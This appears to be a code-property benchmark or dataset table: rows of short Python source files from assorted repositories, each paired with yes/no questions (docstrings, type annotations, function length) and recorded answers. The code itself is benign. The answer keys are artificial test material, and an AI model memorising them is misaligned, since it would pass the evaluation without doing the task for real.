source string | points list | n_points int64 | path string | repo string |
|---|---|---|---|---|
from cv2 import cv2 as cv
import numpy as np
from Pincel import Pincel
from Cor import Cor
desenhando = False
cor = Cor(0, 0, 0)
pincel = Pincel(0, 0, cor, 0)
def nada(x):
    """No-op trackbar callback; OpenCV requires one, but values are polled in the main loop."""
    return None
def desenho(event, x, y, flags, param):
    """OpenCV mouse callback: draws filled circles onto the global `img`
    while the left mouse button is held down.

    event/x/y/flags/param follow the cv.setMouseCallback signature.
    """
    global pincel,cor,desenhando
    # Keep the brush position in sync on every mouse event.
    pincel.x = x
    pincel.y = y
    if event == cv.EVENT_LBUTTONDOWN:
        desenhando = True
    elif event == cv.EVENT_MOUSEMOVE:
        if desenhando:
            # Cor stores (r, g, b); OpenCV expects BGR, hence the reversal.
            cv.circle(img, (pincel.x, pincel.y), pincel.espessura, (pincel.cor.b, pincel.cor.g, pincel.cor.r), -1)
    elif event == cv.EVENT_LBUTTONUP:
        desenhando = False
        # Final dot at the release position.
        cv.circle(img, (pincel.x, pincel.y), pincel.espessura, (pincel.cor.b, pincel.cor.g, pincel.cor.r), -1)
if __name__ == "__main__":
    # Black 400x612 BGR canvas that the mouse callback draws on.
    img = np.zeros((400, 612, 3), np.uint8)
    cv.namedWindow("Paint")
    # Create the trackbars for the colors
    cv.createTrackbar("R", "Paint", 0, 255, nada)
    cv.createTrackbar("G", "Paint", 0, 255, nada)
    cv.createTrackbar("B", "Paint", 0, 255, nada)
    # "Espessura" = brush thickness, 10..50 px.
    cv.createTrackbar("Espessura", "Paint", 10, 50, nada)
    cv.setMouseCallback('Paint', desenho)
    while True:
        cv.imshow("Paint", img)
        k = cv.waitKey(1) & 0xFF
        if k == 27:  # ESC quits
            break
        # Read the current trackbar positions
        r = cv.getTrackbarPos('R', 'Paint')
        g = cv.getTrackbarPos('G', 'Paint')
        b = cv.getTrackbarPos('B', 'Paint')
        pincel.cor.r = r
        pincel.cor.g = g
        pincel.cor.b = b
        raio = cv.getTrackbarPos("Espessura", 'Paint')
        pincel.espessura = raio
        #img[:] = [b, g, r]
    cv.destroyAllWindows()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | main.py | ItaloDias-stack/paintApplication |
#!/usr/bin/python
'''Controls the hud UI and resets the video stream as necessary.'''
import roslib; roslib.load_manifest('reefbot_hudui')
import rospy
import subprocess
import os.path
import sys
import re
import os
import signal
import multiprocessing
def WatchVideoThread(proc):
    """Pump the child process's stdout through a VideoErrorWatcher.

    Stops as soon as the watcher reports that the output should no longer
    be processed (i.e. after it has killed the hud process).
    """
    watcher = VideoErrorWatcher(proc)
    for log_line in proc.stdout:
        should_continue = watcher.CheckLogMessage(log_line)
        if not should_continue:
            break
class VideoErrorWatcher:
    '''Class that replaces stderr so that we can count the video errors are reset if necessary.

    CheckLogMessage returns True while the output should still be processed.'''
    def __init__(self, proc):
        # Number of matching error lines tolerated before the hud is killed.
        self.maxErrorMsgs = rospy.get_param('~max_video_errors', 20)
        self.curCount = 0
        # Matches the h264 decode error indicating a corrupted video stream.
        self.errorRe = re.compile(r'.*number of reference frames exceeds max.*')
        self.proc = proc

    def CheckLogMessage(self, msg):
        """Count video errors in msg; kill the watched process once the
        threshold is exceeded. Returns False after the kill, True otherwise."""
        if self.errorRe.match(msg):
            self.curCount = self.curCount + 1
            if self.curCount > self.maxErrorMsgs:
                rospy.logerr("Killing the hud process. Please wait for it to restart")
                # Bug fix: the original referenced the undefined name `proc`,
                # which raised NameError exactly when the kill was needed.
                os.kill(self.proc.pid, signal.SIGTERM)
                self.curCount = 0
                return False
        rospy.loginfo(msg)
        return True
if __name__ == '__main__':
    rospy.init_node('HudController')
    # hudui.py lives next to this script.
    scriptDir = os.path.dirname(sys.argv[0])
    # Keep the HUD UI alive: restart it whenever it exits (or is killed by
    # the VideoErrorWatcher) until ROS shuts down.
    while not rospy.is_shutdown():
        rospy.logwarn("Starting the HUD UI process")
        proc = subprocess.Popen([os.path.join(scriptDir, 'hudui.py')],
                                stderr=subprocess.STDOUT,
                                stdout=subprocess.PIPE)
        try:
            # Watch the combined stdout/stderr in a separate process so
            # that proc.wait() below is not blocked by log parsing.
            watcherThread = multiprocessing.Process(target=WatchVideoThread,
                                                    args=tuple([proc]))
            watcherThread.start()
            proc.wait()
            watcherThread.terminate()
        finally:
            # Make sure no orphaned hudui.py survives an exception above.
            if proc.poll() is None:
                rospy.logwarn("Killing the hudui.py process")
                proc.kill()
                proc.wait()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | reefbot_hudui/bin/HudController.py | MRSD2018/reefbot-1 |
# -*- coding: utf-8 -*- #
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""List network endpoint groups command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute import lister
from googlecloudsdk.calliope import base
class List(base.ListCommand):
  """Lists Google Compute Engine network endpoint groups."""

  @staticmethod
  def Args(parser):
    # Output columns; a NEG whose selfLink has no zonal/regional scope
    # segment is reported as LOCATION=global.
    parser.display_info.AddFormat("""\
        table(
          name,
          selfLink.scope().segment(-3).yesno(no="global"):label=LOCATION,
          networkEndpointType:label=ENDPOINT_TYPE,
          size
        )
    """)

  def Run(self, args):
    # Aggregated listing across all scopes using the NEG apitools service.
    holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
    client = holder.client
    request_data = lister.ParseMultiScopeFlags(args, holder.resources)
    list_implementation = lister.MultiScopeLister(
        client,
        aggregation_service=client.apitools_client.networkEndpointGroups)
    return lister.Invoke(request_data, list_implementation)


List.detailed_help = base_classes.GetZonalListerHelp('network endpoint groups')
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
... | 3 | lib/surface/compute/network_endpoint_groups/list.py | kustodian/google-cloud-sdk |
from django.db import models
from django.utils.translation import gettext_lazy as _
from Hydro.device.models import Device
class Point(models.Model):
    """A geographic coordinate; 9 decimal places is sub-millimetre precision."""
    _lat = models.DecimalField(_("Latitude"), max_digits=12, decimal_places=9)
    _lng = models.DecimalField(_("Longitude"), max_digits=12, decimal_places=9)

    def __str__(self):
        # "lat,lng" — convenient for pasting into map tools.
        return "{},{}".format(self._lat, self._lng)
class DataPoint(models.Model):
    """A single reading collected by a device, optionally geotagged."""
    device = models.ForeignKey(Device, on_delete=models.CASCADE)
    location = models.ForeignKey(Point, on_delete=models.CASCADE, null=True)
    # added_at = server insert time; collected_at = when the device measured.
    added_at = models.DateTimeField(_("Added at"), auto_now_add=True)
    collected_at = models.DateTimeField(_("Collected at"))
    data = models.IntegerField(_("Data"))
    # NOTE(review): `type` shadows the builtin, but renaming the field would
    # require a schema migration; left as-is.
    type = models.CharField(_("Type"), max_length=50, blank=True)
    extra = models.TextField(_("Extra"), blank=True)

    def get_absolute_url(self):
        # TODO: no detail view exists yet; intentionally returns None.
        pass

    def __str__(self):
        return "{} ==> {}".format(self.type, self.data)

    @property
    def owner(self):
        # Ownership is delegated to the owning device.
        return self.device.owner
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answ... | 3 | Hydro/datapoint/models.py | p-v-o-s/hydro |
import argparse
import sys
from typing import List
from .format_manifest import format_manifest_command
from .index import index_command
from .update import update_command
from .channel import build_channel_command
def parse_arguments(argv: List[str]) -> argparse.Namespace:
    """Build the nur CLI parser and parse argv (argv[0] is the program name).

    Each subcommand stores its handler in the `func` attribute of the
    returned namespace.
    """
    parser = argparse.ArgumentParser(
        prog=argv[0], description="nur management commands"
    )
    subparsers = parser.add_subparsers(description="subcommands")

    # build-channel is the only subcommand taking a positional argument.
    build_channel_parser = subparsers.add_parser("build-channel")
    build_channel_parser.add_argument('directory')
    build_channel_parser.set_defaults(func=build_channel_command)

    for command_name, handler in (
        ("format-manifest", format_manifest_command),
        ("update", update_command),
        ("index", index_command),
    ):
        subparsers.add_parser(command_name).set_defaults(func=handler)

    return parser.parse_args(argv[1:])
def main() -> None:
    """CLI entry point: parse sys.argv and dispatch to the chosen subcommand."""
    parsed = parse_arguments(sys.argv)
    parsed.func(parsed)
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"an... | 3 | nur/__init__.py | dezgeg/NUR |
'''
Helper functions for ``image_slicer``.
'''
import os
from PIL import Image
def get_basename(filename):
    """Strip path and extension. Return basename."""
    name_with_ext = os.path.basename(filename)
    name, _ext = os.path.splitext(name_with_ext)
    return name
def open_images(directory):
    """Open all images in a directory. Return list of Image instances.

    Bug fix: os.listdir returns names relative to `directory`, so they must
    be joined with it before opening; the original only worked when
    `directory` was the current working directory.
    """
    return [Image.open(os.path.join(directory, file))
            for file in os.listdir(directory)]
def get_columns_rows(filenames):
    """Derive number of columns and rows from filenames."""
    positions = []
    for name in filenames:
        # Tiles are named ..._RR_CC.ext; the last 5 stem chars are "RR_CC".
        stem_tail = os.path.splitext(name)[0][-5:]
        row_str, col_str = stem_tail.split('_')
        positions.append((int(row_str), int(col_str)))
    num_rows = max(r for r, _ in positions)
    num_columns = max(c for _, c in positions)
    return (num_columns, num_rows)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/c... | 3 | image_slicer/helpers.py | wolfembers/image_slicer |
class Links:
    """Caches game-object ids for a room's key structures and resolves
    them to live objects on demand via the global Game API."""

    def __init__(self):
        self.mineral_id = None
        self.controller_id = None
        self.source_ids = []
        self.other_ids = []
        self.storage_id = None
        self.terminal_id = None

    def get_mineral(self):
        return Game.getObjectById(self.mineral_id)

    def get_controller(self):
        return Game.getObjectById(self.controller_id)

    def get_sources(self):
        resolved = []
        for source_id in self.source_ids:
            resolved.append(Game.getObjectById(source_id))
        return resolved

    def get_storage(self):
        return Game.getObjectById(self.storage_id)

    def get_terminal(self):
        return Game.getObjectById(self.terminal_id)

    def get_others(self):
        resolved = []
        for other_id in self.other_ids:
            resolved.append(Game.getObjectById(other_id))
        return resolved

    def operational(self):
        # Operational once the controller is known and both sources found.
        if self.controller_id is None:
            return False
        return len(self.source_ids) == 2  # TODO: == number of sources in the room

    def __str__(self):
        return f"mineral={self.mineral_id}, controller={self.controller_id}, sources={self.source_ids}, storage={self.storage_id}, terminal={self.terminal_id}"
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | src/room_manager/links.py | ppolewicz/screeps-starter-python |
"""Tests for the main module."""
import unittest
from unittest.mock import Mock, patch
from yala.main import LinterRunner
class TestLinterRunner(unittest.TestCase):
    """Test the LinterRunner class."""

    @patch('yala.main.Config')
    def test_chosen_not_found(self, mock_config):
        """Should print an error when chosen linter is not found."""
        # Linter chosen by the user
        name = 'my linter'
        mock_config.user_linters = [name]
        _, stderr = self._path_and_run(mock_config, name)
        # A user-selected linter that is not installed must be reported.
        self.assertIn('Did you install', stderr[0])

    @patch('yala.main.Config')
    def test_not_chosen_not_found(self, mock_config):
        """Should not print an error when chosen linter is not found."""
        # No linters chosen by the user
        mock_config.user_linters = []
        stdout, stderr = self._path_and_run(mock_config)
        # Missing linters the user never asked for are silently skipped.
        self.assertEqual(0, len(stdout))
        self.assertEqual(0, len(stderr))

    def _path_and_run(self, mock_config, name='my linter'):
        # Run LinterRunner with a mocked linter class whose subprocess
        # invocation raises FileNotFoundError (linter binary not installed).
        cls = self._mock_linter_class(name)
        mock_config.get_linter_classes.return_value = [cls]
        with patch('yala.main.subprocess.run', side_effect=FileNotFoundError):
            linter_cfg_tgts = cls, mock_config, []
            return LinterRunner.run(linter_cfg_tgts)

    @staticmethod
    def _mock_linter_class(name):
        # Mock linter class whose instance exposes the attributes
        # LinterRunner reads (command_with_options and name).
        linter_class = Mock()
        linter = linter_class.return_value
        linter.command_with_options = linter.name = name
        return linter_class
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written ... | 3 | tests/main.py | viniarck/yala |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import random
class Compose:
    """Chain several point-cloud transforms into one callable.

    Each transform maps (coords, feats) -> (coords, feats); they are
    applied left to right.
    """

    def __init__(self, transforms):
        # Transforms are applied in the order given.
        self.transforms = transforms

    def __call__(self, coords, feats):
        for stage in self.transforms:
            coords, feats = stage(coords, feats)
        return coords, feats
class Jitter:
def __init__(self, mu=0, sigma=0.01):
self.mu = mu
self.sigma = sigma
def __call__(self, coords, feats):
if random.random() < 0.95:
feats += np.random.normal(self.mu, self.sigma, (feats.shape[0], feats.shape[1]))
return coords, feats
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true... | 3 | pretrain/pointcontrast/lib/transforms.py | Shreyas-Gururaj/Point_Contrast_ME0.5.3 |
# Implement int sqrt(int x).
# Compute and return the square root of x, where x is guaranteed to be a non-negative integer.
# Since the return type is an integer, the decimal digits are truncated and only the integer part of the result is returned.
# Example 1:
# Input: 4
# Output: 2
# Example 2:
# Input: 8
# Output: 2
# Explanation: The square root of 8 is 2.82842..., and since
# the decimal part is truncated, 2 is returned.
class Solution:
    def mySqrt(self, x):
        """Return the integer square root (floor of sqrt) of x.

        :type x: int (non-negative)
        :rtype: int
        """
        if x == 0:
            return 0
        elif x < 4:
            return 1
        elif x < 9:
            return 2
        # Binary search on [0, x//2]; for x >= 9, x//2 > sqrt(x).
        res = self.helper(x, 0, x // 2)
        return res

    def helper(self, x, left, right):
        """Recursive binary search for floor(sqrt(x)) within [left, right]."""
        mid = (left + right) // 2
        # mid is the answer iff mid^2 <= x < (mid+1)^2.
        # Bug fix: the original tested `and (mid+1)**2`, which is always
        # truthy, so the search returned the first mid with mid^2 <= x
        # (e.g. mySqrt(100) returned 6).
        if mid ** 2 <= x and (mid + 1) ** 2 > x:
            return mid
        elif mid ** 2 > x:
            right = mid
        else:
            left = mid
        return self.helper(x, left, right)
# Time: O(log(n))
# Space: O(1)
# Difficulty: easy | [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | Math/python/leetcode69_Sqrt_x.py | wenxinjie/leetcode |
from typing import List, Optional
import aiohttp
import json
from aiohttp.client import ClientSession
from itspylearning.consts import ITSLEARNING_URL
from itspylearning.organisation import Organisation
_clientSession: Optional[ClientSession] = None
def _getClient() -> aiohttp.ClientSession:
    """Return the shared aiohttp session, creating it lazily on first use."""
    global _clientSession
    if _clientSession is None:
        _clientSession = aiohttp.ClientSession()
    return _clientSession
async def search_organisations(query) -> List[dict]:
    """Search itslearning for organisations matching `query`.

    Returns a list of {"id", "name"} dicts; the shared HTTP session is
    closed after the call.
    """
    client = _getClient()
    response = await client.get(f"{ITSLEARNING_URL}/restapi/sites/all/organisations/search/v1/?searchText={query}")
    rawData = await response.text()
    data = json.loads(rawData)
    matches = [
        {"id": match["CustomerId"], "name": match["SiteName"],}
        for match in data["EntityArray"]
    ]
    await close_session()
    return matches
async def fetch_organisation(id) -> Organisation:
    """Fetch a single organisation by customer id.

    Raises on non-200 responses or an empty payload; the shared HTTP
    session is closed after the call.
    """
    # NOTE(review): `id` shadows the builtin, but it is part of the public
    # signature, so it is kept for backward compatibility.
    response = await _getClient().get(f"{ITSLEARNING_URL}/restapi/sites/{id}/v1")
    if response.status != 200:
        raise Exception('Request failure.')
    rawData = await response.text()
    data = json.loads(rawData)
    # Bug fix: compare against None with `is`, not `==`.
    if data is None:
        raise Exception("Organisation did not exist.")
    organisation = Organisation(data)
    await close_session()
    return organisation
async def close_session():
    """Close the shared aiohttp session if one exists.

    Bug fix: the original unconditionally called `_clientSession.close()`,
    raising AttributeError whenever no session had been opened yet.
    """
    global _clientSession
    if _clientSession is not None:
        await _clientSession.close()
        _clientSession = None
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer"... | 3 | itspylearning/itslearning.py | HubertJan/itspylearning |
load("@rules_cc//cc:defs.bzl", "cc_binary", "cc_library", "cc_test")
load("@rules_cuda//cuda:defs.bzl", "requires_cuda_enabled")
load("//c10/macros:cmake_configure_file.bzl", "cmake_configure_file")
load("//tools/config:defs.bzl", "if_cuda")
def _genrule(**kwds):
    """Forward to native.genrule, but only for targets not opted out of Bazel."""
    if not _enabled(**kwds):
        return
    native.genrule(**kwds)
def _is_cpu_static_dispatch_build():
    """Bazel builds never use CPU static dispatch."""
    return False
def _py_library(name, **kwds):
    """native.py_library wrapper that drops None entries from deps."""
    filtered_deps = []
    for dep in kwds.pop("deps", []):
        if dep != None:
            filtered_deps.append(dep)
    native.py_library(name = name, deps = filtered_deps, **kwds)
def _requirement(_pypi_project):
    """PyPI requirements resolve to nothing in the Bazel build."""
    return None
# Rules implementation for the Bazel build system. Since the common
# build structure aims to replicate Bazel as much as possible, most of
# the rules simply forward to the Bazel definitions.
rules = struct(
    cc_binary = cc_binary,
    cc_library = cc_library,
    cc_test = cc_test,
    cmake_configure_file = cmake_configure_file,
    filegroup = native.filegroup,
    genrule = _genrule,  # honors the "-bazel" opt-out tag
    glob = native.glob,
    if_cuda = if_cuda,
    is_cpu_static_dispatch_build = _is_cpu_static_dispatch_build,
    py_binary = native.py_binary,
    py_library = _py_library,  # filters out None deps
    requirement = _requirement,  # no-op under Bazel
    requires_cuda_enabled = requires_cuda_enabled,
    select = select,
    test_suite = native.test_suite,
)
def _enabled(tags = [], **_kwds):
    """Determines if the target is enabled.

    A target opts out of the Bazel build by carrying the "-bazel" tag.
    """
    for tag in tags:
        if tag == "-bazel":
            return False
    return True
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (ex... | 3 | tools/bazel.bzl | YifanShenSZ/pytorch |
import logging
from tenacity import retry, stop_after_attempt, wait_fixed, before_log, after_log
from app.db.external_session import db_session
from app.db.init_db import init_db
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
max_tries = 60 * 5 # 5 minutes
wait_seconds = 1
@retry(
    stop=stop_after_attempt(max_tries),
    wait=wait_fixed(wait_seconds),
    before=before_log(logger, logging.INFO),
    after=after_log(logger, logging.WARN),
)
def init():
    """Block until the database accepts connections (retried by @retry)."""
    # Try to create session to check if DB is awake
    db_session.execute("SELECT 1")
def main():
    """Log start/finish around the database readiness check."""
    logger.info("Initializing service")
    init()
    logger.info("Service finished initializing")
# Script entry point (run by the container before starting the app).
if __name__ == "__main__":
    main()
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?... | 3 | {{cookiecutter.project_slug}}/backend/app/app/backend_pre_start.py | abnerjacobsen/full-stack |
'''
Created on 2019年6月19日
@author: bkd
'''
from tkinter import *
def data():
    # Populate the scrollable inner frame with 50 demo rows of labels.
    # Relies on the module-level `frame` created below.
    for i in range(50):
        Label(frame, text=i).grid(row=i, column=0)
        Label(frame, text="my text" + str(i)).grid(row=i, column=1)
        Label(frame, text="..........").grid(row=i, column=2)
def myfunction(event):
    # <Configure> handler: grow the canvas scroll region to the inner
    # frame's current bounding box so the scrollbar covers all rows.
    # canvas.configure(scrollregion=canvas.bbox("all"), width=200, height=200)
    canvas.configure(scrollregion=canvas.bbox("all"))
    # pass
root = Tk()
# sizex = 800
# sizey = 600
# posx = 100
# posy = 100
# root.wm_geometry("%dx%d+%d+%d" % (sizex, sizey, posx, posy))
# myframe = Frame(root, relief=GROOVE, width=50, height=100, bd=1)
myframe = Frame(root, bd=5, background="blue")
# myframe.place(x=10, y=10)
myframe.pack()
# Layout: outer frame [canvas [inner frame], scrollbar]
# 1. The canvas
canvas = Canvas(myframe)
# 2. The inner frame placed on the canvas
frame = Frame(canvas, bd=5, background="red")
# canvas.create_window((0, 0), window=frame, anchor='nw')
canvas.create_window((0, 0), window=frame)
# 3. The scrollbar attached to the outer frame
myscrollbar = Scrollbar(myframe, orient="vertical", command=canvas.yview, bd=5, background="yellow", width=25)
# Lay out the canvas and scrollbar inside the outer frame
canvas.pack(side="left", fill=BOTH, expand=True)
myscrollbar.pack(side="right", fill="y")
# Wire up scrolling behaviour
canvas.configure(yscrollcommand=myscrollbar.set)
frame.bind("<Configure>", myfunction)
data()
root.mainloop()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | test/t22.py | bkdwei/kdGUI |
import unittest
from app.models import NewsArticle
class ArticleTest(unittest.TestCase):
    '''
    Test Class to test the behaviour of the NewsArticle class
    '''
    def setUp(self):
        '''
        Set up method that will run before every Test
        '''
        # Fixture built from dummy values.
        # NOTE(review): argument meaning inferred from the call site —
        # confirm against NewsArticle's constructor signature.
        self.new_article = NewsArticle("CNN", "John Doe", "Christmas in the City", "/home", "/image", "30-05-2020", "Lorem", "Ipsum")

    def test_instance(self):
        # The fixture should be a NewsArticle instance.
        self.assertTrue(isinstance(self.new_article,NewsArticle))
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true... | 3 | tests/test_news_article.py | Collin9726/Marekani |
import os
from typing import TYPE_CHECKING
from modules.base import ModuleProcessor
from opta.core.terraform import get_terraform_outputs
from opta.exceptions import UserErrors
if TYPE_CHECKING:
from opta.layer import Layer
from opta.module import Module
class MongodbAtlasProcessor(ModuleProcessor):
    """Module processor for mongodb-atlas modules.

    Validates that the Atlas API credentials are present and injects the
    cloud provider, region and NAT IPs into the module data before
    terraform runs.
    """

    # Environment variables required by the mongodbatlas terraform provider.
    REQUIRED_ENV_VARS = {"MONGODB_ATLAS_PUBLIC_KEY", "MONGODB_ATLAS_PRIVATE_KEY"}

    def __init__(self, module: "Module", layer: "Layer"):
        if module.data["type"] != "mongodb-atlas":
            raise Exception(
                f"The module {module.name} was expected to be of type mongodb-atlas"
            )
        # Modernized from py2-style super(MongodbAtlasProcessor, self).
        super().__init__(module, layer)

    def pre_hook(self, module_idx: int) -> None:
        """Fail fast if the Atlas credentials are missing from the environment."""
        missing = self.REQUIRED_ENV_VARS - set(os.environ.keys())
        if missing:
            raise UserErrors(
                "Opta did not find environment variable(s), please set them and retry: {}".format(
                    missing
                )
            )
        super().pre_hook(module_idx)

    def process(self, module_idx: int) -> None:
        """Inject provider/region/NAT-IP settings derived from the layer."""
        self.module.data["cloud_provider"] = self.layer.cloud.upper()
        if self.module.data["cloud_provider"] == "LOCAL":
            self.module.data["cloud_provider"] = "AWS"  # For local, always spin up in AWS
            self.module.data["region"] = "US_EAST_1"
        # Atlas needs the root layer's NAT IPs for its network access list.
        base_layer = self.layer.root()
        root_outputs = get_terraform_outputs(base_layer)
        self.module.data["public_nat_ips"] = root_outputs["public_nat_ips"]
        super().process(module_idx)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | modules/mongodb_atlas/mongodb_atlas.py | riddopic/opta |
class WordDictionary(object):
    """Trie-backed dictionary supporting '.' wildcard search.

    The sentinel key '#' marks the end of a stored word inside the trie.
    """

    def __init__(self):
        """
        initialize your data structure here.
        """
        self.trie = {}

    def addWord(self, word):
        """
        Adds a word into the data structure.
        :type word: str
        :rtype: void
        """
        node = self.trie
        for ch in word:
            node = node.setdefault(ch, {})
        node['#'] = '#'  # terminal marker

    def search(self, word, trie=None):
        """
        Returns if the word is in the data structure. A word could
        contain the dot character '.' to represent any one letter.
        :type word: str
        :rtype: bool
        """
        # Bug fix: test `trie is None` rather than falsiness so an empty
        # subtrie passed recursively is never silently replaced by the root.
        if trie is None:
            trie = self.trie
        if not word:
            return '#' in trie
        c = word[0]
        if c in trie:
            return self.search(word[1:], trie[c])
        if c == '.':
            # Wildcard: try every child except the terminal marker.
            return any(
                self.search(word[1:], trie[cc])
                for cc in trie
                if cc != '#'
            )
        # Bug fix: the original fell off the end and returned None here;
        # return an actual bool as the docstring promises.
        return False
# Your WordDictionary object will be instantiated and called as such:
# wordDictionary = WordDictionary()
# wordDictionary.addWord("word")
# wordDictionary.search("pattern") | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding s... | 3 | backtracking/wordDictionaryUsingTrie.py | saai/LeetcodePythonSolutions |
#!/usr/bin/env python3
import tensorflow as tf
from layers.spectral_normalization import SpectralNormalization
class SpadeBN(tf.keras.layers.Layer):
    """SPADE BatchNormalization

    Normalizes `x` with a sync batch norm, then denormalizes it with a
    scale (gamma) and shift (beta) computed from the conditioning map.

    Sources:
    https://towardsdatascience.com/implementing-spade-using-fastai-6ad86b94030a
    """

    def __init__(self, width: int = 128, kernel_size=3, **kwargs):
        # Bug fix: the original never called super().__init__(), skipping
        # the Keras Layer machinery (naming, sublayer tracking, **kwargs).
        super().__init__(**kwargs)
        # Bug fix: store the hyper-parameters; get_config() reads self.width,
        # which the original never assigned (AttributeError on save).
        self.width = width
        self.kernel_size = kernel_size
        self.bn = tf.keras.layers.experimental.SyncBatchNormalization()
        self.conv0 = SpectralNormalization(
            tf.keras.layers.Conv2D(width, kernel_size=kernel_size, activation="relu")
        )
        self.conv1 = SpectralNormalization(
            tf.keras.layers.Conv2D(width, kernel_size=kernel_size, activation="relu")
        )
        self.conv2 = SpectralNormalization(
            tf.keras.layers.Conv2D(width, kernel_size=kernel_size, activation="relu")
        )

    def call(self, x: tf.Tensor, cond: tf.Tensor):
        """Apply SPADE: bn(x) * gamma(cond) + beta(cond)."""
        interim_conv = self.conv0(cond)
        gamma = self.conv1(interim_conv)
        beta = self.conv2(interim_conv)
        outputs = self.bn(x) * gamma + beta
        return outputs

    def get_config(self):
        """Return the layer config for serialization."""
        config = super().get_config()
        # Bug fix: report the stored kernel_size instead of hard-coding 3.
        config_update = {"width": self.width, "kernel_size": self.kernel_size}
        config.update(config_update)
        return config
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding se... | 3 | layers/spadebn.py | ackness/GazeFlow |
import atexit
from .MecanumRover_MotorDriver import MecanumRover_MotorDriver
import traitlets
from traitlets.config.configurable import Configurable
class Motor(Configurable):
    # Commanded motor value in [-1, 1]; observed below to drive the hardware.
    value = traitlets.Float()

    # config
    alpha = traitlets.Float(default_value=1.0).tag(config=True)  # gain applied to value
    beta = traitlets.Float(default_value=0.0).tag(config=True)   # constant offset

    def __init__(self, driver, channel, *args, **kwargs):
        super(Motor, self).__init__(*args, **kwargs)  # initializes traitlets
        self._driver = driver
        self._motor = self._driver.getMotor(channel)
        # Make sure the motor is stopped when the process exits.
        atexit.register(self._release)

    @traitlets.observe('value')
    def _observe_value(self, change):
        # Push every change of `value` straight to the hardware.
        self._write_value(change['new'])

    def _write_value(self, value):
        """Sets motor value between [-1, 1]"""
        # Dead-zone to suppress jitter from joysticks and similar inputs.
        if abs(value) <= 0.05:
            value = 0.0
        # Convert to the motor's target speed in mm/s (max 1300 mm/s).
        mapped_value = int(1300.0 * (self.alpha * value + self.beta))
        speed = min(max(mapped_value, -1300), 1300)
        self._motor.setSpeed(speed)

    def _release(self):
        """Stops motor by releasing control"""
        self._motor.setSpeed(0)
| [
{
"point_num": 1,
